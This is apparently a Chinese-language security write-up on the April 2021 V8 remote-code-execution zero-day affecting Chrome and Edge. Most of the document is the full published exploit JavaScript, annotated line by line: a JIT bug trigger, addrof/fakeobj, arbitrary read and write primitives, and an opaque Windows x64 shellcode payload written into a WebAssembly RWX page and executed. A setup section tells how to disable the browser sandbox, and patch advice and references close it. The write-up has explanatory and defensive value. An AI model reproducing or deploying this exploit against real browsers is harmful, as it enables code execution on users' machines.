2021HW — Chrome 0day漏洞
目錄
簡述
漏洞環境
程序
修復建議
參考
2021HW — Chrome 0day漏洞
簡述
北京時間4月13日凌晨,安全研究人員Rajvardhan Agarwal在推特上公開了一個可遠程代碼執行(RCE)的0Day漏洞利用代碼,目標是Chrome與基於Chromium的Edge共用的JavaScript引擎V8;該利用代碼可在當時最新版本的谷歌Chrome瀏覽器和微軟Edge上運行,但它只包含V8層面的代碼執行,並不包含沙盒逃逸,
為了演示該漏洞,研究者在Edge 89.0.774.76版本和Chrome 89.0.4389.114版本上以關閉沙盒的方式啟動瀏覽器進行測試(見下文「漏洞環境」);這意味著該PoC只證明了渲染進程內的代碼執行,真實攻擊還需要再配合一個沙盒逃逸漏洞,
分析 https://zhuanlan.zhihu.com/p/29097125
原理
說明:本節「原理」是對Web應用中遠程命令/代碼執行漏洞的一般性介紹,並不是本文Chrome 0day的成因——本文的漏洞是V8 JIT編譯器中的內存安全缺陷(詳見下文利用代碼及其註釋),與後端拼接系統命令無關。就Web應用而言,遠程系統命令執行漏洞一般是因為應用系統從設計上需要給用戶提供指定的遠程命令操作的介面,比如我們常見的路由器、防火墻、入侵檢測等設備的web管理界面上,一般會給用戶提供一個ping操作的web界面,用戶從web界面輸入目標IP,提交后,后臺會對該IP地址進行一次ping測試,并回傳測試結果,
如果,設計者在完成該功能時,沒有做嚴格的安全控制,則可能會導致攻擊者通過該介面提交“意想不到”的命令,從而讓后臺進行執行,從而控制整個后臺服務器,
現在很多的甲方企業都開始實施自動化運維,大量的系統操作會通過"自動化運維平臺"進行操作,在這種平臺上往往會出現遠程系統命令執行的漏洞,
遠程代碼執行
同樣的道理,因為需求設計,后臺有時候也會把用戶的輸入作為代碼的一部分進行執行,也就造成了遠程代碼執行漏洞,
不管是使用了代碼執行的函式,還是使用了不安全的反序列化等等,都可能導致這類問題。因此,如果需要給前端用戶提供操作類的API介面,一定需要對介面輸入的內容進行嚴格的校驗,比如實施嚴格的白名單策略會是一個比較好的方法。
作用
RCE漏洞,可以讓攻擊者直接向后臺服務器遠程注入作業系統命令或者代碼,從而控制后臺系統。對瀏覽器而言,RCE漏洞意味著攻擊者只需誘使用戶打開一個惡意網頁,就能以瀏覽器進程的權限在用戶機器上執行任意代碼;若再配合沙盒逃逸或本地提權漏洞,即可完全控制用戶主機。
漏洞環境


"C:\Program Files\Google\Chrome\Application\chrome.exe" -no-sandbox
以 --no-sandbox 參數啟動Chrome,關閉瀏覽器的沙盒(Sandbox)功能;該功能默認開啟,正常使用時不應關閉。
簡而言之,在沙盒開啟的正常配置下,單獨使用此PoC無法在瀏覽器之外執行代碼:V8漏洞本身仍會被觸發並在渲染進程內執行shellcode,但攻擊者還需要一個額外的沙盒逃逸漏洞才能真正控制系統。因此「正常瀏覽器不會被利用」只對這個未配合沙盒逃逸的PoC成立,不應據此認為無需升級。
程序

<!-- Loads the V8 PoC below (exploit.js). It ends by executing native shellcode
     in the renderer process, so open this page only in an isolated, disposable
     VM, with Chrome started via --no-sandbox as described above. -->
<script src="exploit.js"></script>
/*
/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
// Minimal WebAssembly module: one function type () -> i32, one function whose
// body is `i32.const 42`, a 1-page memory, and two exports ("memory", "main").
// The exploit does not care about the result of main; it only needs a live
// WebAssembly instance, whose object is later read at +0x68 to locate what the
// PoC assumes is an RWX code page (see rwx_page_addr below).
var wasm_code = Uint8Array.from([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod, {});
// `f` is the exported entry point; it is called once at the very end, after
// the shellcode has been copied over the instance's code page.
var { main: f } = wasm_instance.exports;
// One 8-byte scratch buffer viewed both as a double and as two uint32 words.
// ftoi/itof reinterpret bits through it; they are the basis of every
// address/pointer conversion in this PoC.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
// Backing store of this buffer is later redirected (copy_shellcode) so that
// a DataView over it writes to an arbitrary address. 0x150 bytes = 84 words,
// which is larger than the shellcode array below.
let buf2 = new ArrayBuffer(0x150);

/**
 * Reinterpret the bit pattern of a double as an unsigned 64-bit BigInt.
 * @param {number} val - IEEE-754 double
 * @returns {bigint} the raw 64 bits (little-endian words: low, high)
 */
function ftoi(val) {
  f64_buf[0] = val;
  const [lo, hi] = u64_buf;
  return (BigInt(hi) << 32n) | BigInt(lo);
}

/**
 * Inverse of ftoi: build a double whose bit pattern is the given 64-bit value.
 * @param {bigint} val - unsigned 64-bit integer
 * @returns {number} the double with that bit pattern
 */
function itof(val) {
  u64_buf.set([Number(val & 0xffffffffn), Number(val >> 32n)]);
  return f64_buf[0];
}
// Uint32Array holding 2**31. Inside foo, `_arr[0] ^ 0` forces an int32
// coercion, so the value seen there is -2147483648; the whole arithmetic
// chain in foo is built around that wrap-around.
const _arr = new Uint32Array([2**31]);
// JIT trigger function. Interpreted, the arithmetic chain always ends with
// x == 0, so `arr` is an empty array and the function returns [[], cor].
// The sequence is shaped so that, once V8 has optimized foo (see the warm-up
// loop that follows), the compiler presumably mis-types one of the
// intermediate values and produces an `arr` that can be indexed out of
// bounds — that is the bug this PoC abuses. `cor` is allocated right after
// `arr`, presumably so that OOB accesses through `arr` land in `cor`.
// Do NOT reorder, simplify or "clean up" these statements: every step exists
// to steer the JIT, not for its arithmetic result.
// `a` is unused; it only varies the argument during warm-up.
function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1; // int32 coercion: 2**31 -> -2147483648, +1 -> -2147483647
x = Math.abs(x); // 2147483647
x -= 2147483647; // 0
x = Math.max(x, 0); // 0
x -= 1; // -1
if(x==-1) x = 0; // interpreter always takes this branch, giving x = 0
var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}
// Warm-up: call foo 0x3000 times so that V8 tiers it up to optimized code.
for(var i=0;i<0x3000;++i)
foo(true);
// Once optimized, foo(false) is expected to return an `arr` whose length V8
// believes is larger than its real storage, giving out-of-bounds access.
var x = foo(false);
var arr = x[0];
var cor = x[1];
// Offset (in `arr` element slots) at which the neighbouring `cor` array is
// presumed to start on this V8 build; arr[idx+1] is used below as the slot
// aliased with cor[0] by addrof/fakeobj.
const idx = 6;
// OOB write through `arr`: presumably overwrites cor's length field with
// 0x4242 so that `cor` itself can later be indexed past its real 3 elements
// (cor[3] is read below to leak a map).
arr[idx+10] = 0x4242;
/**
 * addrof primitive: leak the address of an object.
 * Stores `k` into arr[idx+1], which — via the OOB layout set up above — is
 * the same memory as cor[0]; reading cor[0] back as a double and truncating
 * to 32 bits yields the (apparently pointer-compressed) address of `k`.
 * @param {object} k - any JS object
 * @returns {bigint} low 32 bits of the leaked pointer
 */
function addrof(k) {
  arr[idx+1] = k;
  const leaked = ftoi(cor[0]);
  return BigInt.asUintN(32, leaked);
}
/**
 * fakeobj primitive: inverse of addrof.
 * Writes the raw value `k` into cor[0] (as a double) and reads it back
 * through arr[idx+1], where V8 treats the same bits as an object reference.
 * @param {bigint} k - address to be interpreted as an object
 * @returns {object} a JS value whose backing memory is at `k`
 */
function fakeobj(k) {
  const asDouble = itof(k);
  cor[0] = asDouble;
  return arr[idx+1];
}
// Leak the header words of a packed-double array: cor[3] is one past cor's
// real length and is only readable because its length was corrupted above;
// the 8 bytes read are presumed to be the map (and neighbouring field) of cor.
var float_array_map = ftoi(cor[3]);
// arr2's inline double elements become the body of a fake JS object: element 0
// supplies the leaked map, element 1 is later overwritten by arbread/arbwrite
// with a crafted elements pointer. 1.2/2.3/3.4 are just filler.
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
// Materialise the fake object at addrof(arr2)+0x20; 0x20 is assumed to be the
// distance from arr2's object address to its elements storage on this build.
var fake = fakeobj(addrof(arr2) + 0x20n);
/**
 * Arbitrary read: return the 8 bytes at `addr` as a double.
 * The address is forced to have its low bit set (V8 tags heap pointers with
 * a 1 in bit 0); the upper 32 bits of the planted word (2) presumably act as
 * the fake elements-array length, and the lower 32 bits point 8 bytes before
 * the target so that fake[0] resolves to `addr`.
 * @param {bigint} addr - (compressed) address to read from
 * @returns {number} the value at addr, as a double (convert with ftoi)
 */
function arbread(addr) {
  const tagged = (addr & 1n) === 0n ? addr + 1n : addr;
  arr2[1] = itof((2n << 32n) + (tagged - 8n));
  return fake[0];
}
/**
 * Arbitrary write: store `val` as 8 raw bytes at `addr`.
 * Mirror of arbread — same pointer tagging and same crafted elements word —
 * but assigns through fake[0] instead of reading it.
 * @param {bigint} addr - (compressed) address to write to
 * @param {bigint|number} val - value to write (converted with BigInt())
 */
function arbwrite(addr, val) {
  const tagged = (addr & 1n) === 0n ? addr + 1n : addr;
  arr2[1] = itof((2n << 32n) + (tagged - 8n));
  fake[0] = itof(BigInt(val));
}
/**
 * Copy the shellcode words to an arbitrary address.
 * The DataView over buf2 is created BEFORE buf2's backing-store pointer
 * (assumed to sit at +0x14 in the ArrayBuffer object on this build) is
 * redirected to `addr`; keep that order, it matches the published PoC.
 * Words are written little-endian, 4 bytes apart. DataView bounds-checks
 * against buf2's 0x150-byte length, so at most 84 words can be copied.
 * @param {bigint} addr - destination address (here: the RWX page)
 * @param {number[]} shellcode - payload as 32-bit words
 */
function copy_shellcode(addr, shellcode) {
  const view = new DataView(buf2);
  const backingStoreField = addrof(buf2) + 0x14n;
  arbwrite(backingStoreField, addr);
  for (const [i, word] of shellcode.entries()) {
    view.setUint32(4 * i, word, true);
  }
}
// Read the field at wasm_instance+0x68, assumed (for this Chrome build) to hold
// the pointer to the RWX code page backing the WebAssembly instance.
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
// Native shellcode as little-endian 32-bit words. The first word decodes to
// `fc 48 83 e4`, the usual cld / and rsp,... prologue of Windows x64 shellcode,
// consistent with the chrome.exe path above. The page does not say what the
// payload does; treat it as an opaque, untrusted binary and never run it
// outside a disposable VM.
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
// Overwrite the RWX page with the shellcode, then call the wasm export so that
// execution lands on it — this is the actual code-execution step.
copy_shellcode(rwx_page_addr, shellcode);
f();
上述代碼先利用V8 JIT的缺陷取得越界數組訪問,以此構造addrof/fakeobj以及任意地址讀寫原語,再把shellcode寫入WebAssembly實例的RWX(可讀寫執行)內存頁並調用其導出函數,從而在瀏覽器(渲染)進程中執行任意代碼。


修復建議
及時升級到最新版本的谷歌瀏覽器(https://www.google.com/intl/zh-CN/chrome/)以及Edge瀏覽器(https://www.microsoft.com/en-us/edge);Google於2021年4月13日發布的Chrome 89.0.4389.128已修復此漏洞,Edge亦隨後發布了對應的安全更新(具體版本以廠商公告[5]為準)。此外,切勿以 --no-sandbox 參數運行Chrome/Edge;也應留意禁用了沙盒的基於Chromium/Electron的應用,它們內嵌的V8同樣可能受此類漏洞影響。
參考
(注:下列[1]–[4]所指向的 crbug 1053604 / CVE-2020-6418 是2020年2月修復的另一個V8漏洞,並非本文2021年4月披露的0Day;本文漏洞對應的是2021年4月13日Chrome 89.0.4389.128穩定版更新中修復的V8問題(CVE-2021-21220),建議以該次更新公告為準。)
[1] https://bugs.chromium.org/p/chromium/issues/detail?id=1053604
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418
[3] https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html
[4] https://www.zdnet.com/article/google-patches-chrome-zero-day-under-active-attacks/
[5] https://docs.microsoft.com/zh-cn/deployedge/microsoft-edge-relnotes-security



